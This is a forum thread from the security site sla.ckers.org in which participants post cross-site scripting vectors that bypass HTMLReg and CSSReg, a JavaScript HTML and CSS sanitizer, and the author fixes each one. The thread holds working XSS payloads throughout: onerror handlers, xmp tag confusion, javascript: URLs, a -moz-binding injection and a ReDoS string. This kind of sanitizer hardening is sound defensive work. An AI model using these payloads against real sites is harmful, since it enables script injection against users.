Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
HTMLReg
Posted by: Gareth Heyes
Date: April 15, 2010 05:35AM

Next challenge, can you break a JavaScript based HTML sandbox?

http://www.thespanner.co.uk/2010/04/15/htmlreg/

*Updated*

@Kyo posted a vector on the cheatsheet that worked but I've patched it now...

1337 Hax0rs bypassing HTMLReg (in order of awesomeness vectors)
-----------------------------------------------------------------
1. Hasegawa <img src="x:x" alt="``onerror=alert(1)">
2. LeverOne <xmp><a alt='&lt;/xmp&gt;&lt;img/src=x:x onerror=alert(1)//'>jjj</a>
3. LeverOne <XMP><IMG src="lo</XMP><IMG src=. onerror=alert(/hacked/)//">
4. Mario <table background="javascript:alert(1)//">
5. Kyo <img src= alt=" onerror=alert(1)//">
6. theharmonyguy <img class="& #09;myclass& #09;">

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 5 time(s). Last edit at 05/11/2010 05:22PM by Gareth Heyes.

Options: ReplyQuote
Re: HTMLReg
Posted by: LeverOne
Date: April 15, 2010 12:09PM

input:
<img src=`lo<img src=. onerror=alert(/hacked/)//`>
output:
<IMG src="#" src="." onerror="alert(/hacked/)//`">


list of winners, please! ))

----------------------
~Veritas~

Options: ReplyQuote
Re: HTMLReg
Posted by: LeverOne
Date: April 15, 2010 12:27PM

and more!

input:
<XMP><IMG src="lo</XMP><IMG src=. onerror=alert(/hacked/)//">

output:
<XMP><IMG src="lo</XMP><IMG src="." onerror='alert(/hacked/)//"'>

upd: -- sorry, "<" --> "%3C" (not seen in Opera)

----------------------
~Veritas~



Edited 1 time(s). Last edit at 04/15/2010 12:54PM by LeverOne.

Options: ReplyQuote
Re: HTMLReg
Posted by: lightos
Date: April 15, 2010 12:30PM

Nice one LeverOne. Btw, the extra <img src=. can be removed and it still works.

Options: ReplyQuote
Re: HTMLReg
Posted by: Anonymous User
Date: April 15, 2010 02:20PM

@LeverOne Awesome stuff - again! :)

<img src=` onerror=alert(1)//`> <- the problem are the back-ticks misunderstood as delimiter - maybe it'd make sense to treat them as such on IE only? Also I would suggest to encode src as well - like it's done for href and other attributes



Edited 1 time(s). Last edit at 04/15/2010 02:30PM by .mario.

Options: ReplyQuote
Re: HTMLReg
Posted by: Anonymous User
Date: April 15, 2010 02:36PM

This one triggers strange delimiter replacement on Opera 10+:

In: <marquee src=`" onscroll=alert(1)//`>

Out: <MARQUEE src='`"' onscroll="alert(1)//`">

Options: ReplyQuote
Re: HTMLReg
Posted by: Gareth Heyes
Date: April 15, 2010 03:36PM

AWESOME!

I shall remove ` as a attribute delim............

AND FIXED! :)

Update....
theharmonyguy also reported some cool class bypasses <img class="& #09;myclass& #09;"> now fixed as I don't allow classes outside the application. So myclass becomes $myapplication_myclass$

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 2 time(s). Last edit at 04/16/2010 02:53AM by Gareth Heyes.

Options: ReplyQuote
Re: HTMLReg
Posted by: Gareth Heyes
Date: April 16, 2010 08:01AM

Fixed a REDOS issue that I found using spaces as I was doing:-
([\s]|[^'])*

The vector was like this:-
<div class=" a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a "

Also added limits to the RegExes so that we have a attribute length limit (1000) and maximum attributes per tag (20).

Update...
I missed this one:-
<XMP><IMG src="lo</XMP><IMG src="." onerror='alert(/hacked/)//"'>

Wow nice! :) I'm fixing now


Update++

Think it's fixed with recent changes, can anyone still repro?

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 2 time(s). Last edit at 04/16/2010 08:24AM by Gareth Heyes.

Options: ReplyQuote
Re: HTMLReg
Posted by: Gareth Heyes
Date: April 16, 2010 08:45AM

Ok this one fixed too:-
<XMP><IMG src="lo</XMP><IMG src=. onerror=alert(/hacked/)//">

Removed <> from allowed characters in attributes. Damn Opera!

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: HTMLReg
Posted by: Gareth Heyes
Date: April 23, 2010 12:15PM

So it appears I can't trust the DOM when creating individual css rules in various browsers. So you guessed it I wrote a CSS regex parser.

HTMLReg updated!
http://www.businessinfo.co.uk/labs/HTMLReg/HTMLReg.html

You can play with the CSSReg parsing here:-
http://www.businessinfo.co.uk/labs/CSSReg/CSSReg.html

All this is because sirdarckcat is awesome and proved the current method flawed.

Can you break it/them? :D

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: HTMLReg
Posted by: LeverOne
Date: April 23, 2010 03:14PM

it's easy for me...

in:
background:url(//lo&#x0A&#x29;;-moz-binding:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss&#x29/*);
out:
background:url('//lo&#x0A&#x29;;-moz-binding:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss&#x29/*');

LeverOne

upd: CSSReg only.

----------------------
~Veritas~



Edited 3 time(s). Last edit at 04/23/2010 04:19PM by LeverOne.

Options: ReplyQuote
Re: HTMLReg
Posted by: Gareth Heyes
Date: April 23, 2010 04:29PM

Haha nice I'll have to update my replacement chars

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: HTMLReg
Posted by: sirdarckcat
Date: April 24, 2010 05:09PM

this doesnt work!
<div style="background-image: url('http://red/x?y=1');">xxx</div>

and is broken anyway heh
x{
background-image:url('http://xD/x?z=m'asdf;
lulz:lolz;
lolz:lolz');
}

use ACS/CAJA!

Greetings

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: ReplyQuote
Re: HTMLReg
Posted by: Kyo
Date: April 25, 2010 12:40PM

Hey, neat. I'm now breaking applications without being aware of them

Skillz

Options: ReplyQuote
Re: HTMLReg
Posted by: Gareth Heyes
Date: April 26, 2010 02:27AM

@Kyo

It's called the art of XSS without XSS ;)

@sirdarckcat

Yeah yeah :P

@LeverOne @sirdarckcat

Fixed CSSReg that was easy but HTMLReg is still not 100% because of CSS DOM rewriting

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: HTMLReg
Posted by: Gareth Heyes
Date: April 26, 2010 05:45PM

Ok with EXTREME difficulty I've hacked up some css with IE so it doesn't rewrite the CSS but does clean HTML. This should be pretty safe from attack now *I think*

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: HTMLReg
Posted by: Gareth Heyes
Date: April 29, 2010 05:15AM

No exploits for a while, so I thought I'd make it a little easier. HTMLReg/CSSReg now decode entities into escapes:-

<div style="background-image:url('/x&amp;x')">xxx</div>

Becomes:-

<div style="background-image: url('/x\26 x');">xxx</div>

C'mon pwn me

Still no exploits? :)
I've made it easier now, I've included the style tags and selectors
http://www.businessinfo.co.uk/labs/CSSReg/CSSReg.html

e.g.
Allowed:-
span, div, #id .someclass {
color:#FFF;
}

Banned:-
body {} //disallowed tag
span + div {} //only basic selectors allowed .class #id or ,

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 04/30/2010 08:59AM by Gareth Heyes.

Options: ReplyQuote
Re: HTMLReg
Posted by: sirdarckcat
Date: May 01, 2010 02:45AM

haha I'll pwn it, dont worry :P, I've been busy this week.. my internetz failz

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: ReplyQuote
Re: HTMLReg
Posted by: LeverOne
Date: May 01, 2010 07:23AM

I found a small bug in CSSReg, but it's harmless (v.0.0.11).

in
.lo{.lo{background:url(//);
#lo{background:url(//)}
out
#myApplication ._myApplication_lo_ { 
#myApplication ._myApplication_lo_ { 
background:url('//');#myApplication #_myApplication_lo_ { 
background:url('//');
}

----------------------
~Veritas~

Options: ReplyQuote
Re: HTMLReg
Posted by: Gareth Heyes
Date: May 01, 2010 11:24AM

@LeverOne

Yeah small bug but nice :) I'll fix it though

Update...
And fixed! Thanks, CSSReg now closes open { when not closed and doesn't allow multiple open selectors without closing them first. This makes it much better for parsing CSS thanks again

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 05/01/2010 02:49PM by Gareth Heyes.

Options: ReplyQuote
Re: HTMLReg
Posted by: sirdarckcat
Date: May 11, 2010 02:20PM

courtesy of hasegawa

<img src="x:x" alt="``onerror=alert(1)">

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: ReplyQuote
Re: HTMLReg
Posted by: LeverOne
Date: May 11, 2010 03:29PM

@sirdarckcat & @hasegawayosuke, NICE!

From me:

<xmp><a alt='&lt;/xmp&gt;&lt;img/src=x:x onerror=alert(1)//'>jjj</a>

Edit: Opera + IE!

----------------------
~Veritas~



Edited 2 time(s). Last edit at 05/12/2010 12:27AM by LeverOne.

Options: ReplyQuote
Re: HTMLReg
Posted by: Gareth Heyes
Date: May 11, 2010 03:53PM

@LeverOne, @sirdarckcat & @hasegawayosuke

All awesome! :D Thanks!!!

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: HTMLReg
Posted by: Gareth Heyes
Date: May 11, 2010 05:20PM

Annnnnnnnnnddddddd fixed!!!!

I've removed innerHTML for the element div as it is just crazy what IE/Opera return. I build the HTML manually by constructing the < tagName then loop through the attributes and values and force "" and escape the node value with a whitelist of course. Because of this change I now allow <> inside attributes. Thanks ALL!!!!!!

Update...
Added form elements because I'm going to allow apps to be created on HV. Textarea, input etc are now support. Form is supported but without the action attribute

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 2 time(s). Last edit at 05/14/2010 12:28PM by Gareth Heyes.

Options: ReplyQuote


Sorry, only registered users may post in this forum.